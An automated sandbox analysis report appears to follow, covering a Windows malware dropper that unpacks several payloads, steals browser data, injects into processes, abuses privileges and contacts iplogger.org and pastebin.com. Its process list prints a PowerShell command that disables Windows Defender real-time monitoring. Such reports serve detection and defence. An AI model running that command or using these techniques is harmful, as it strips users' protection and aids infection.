N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1724 set thread context of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

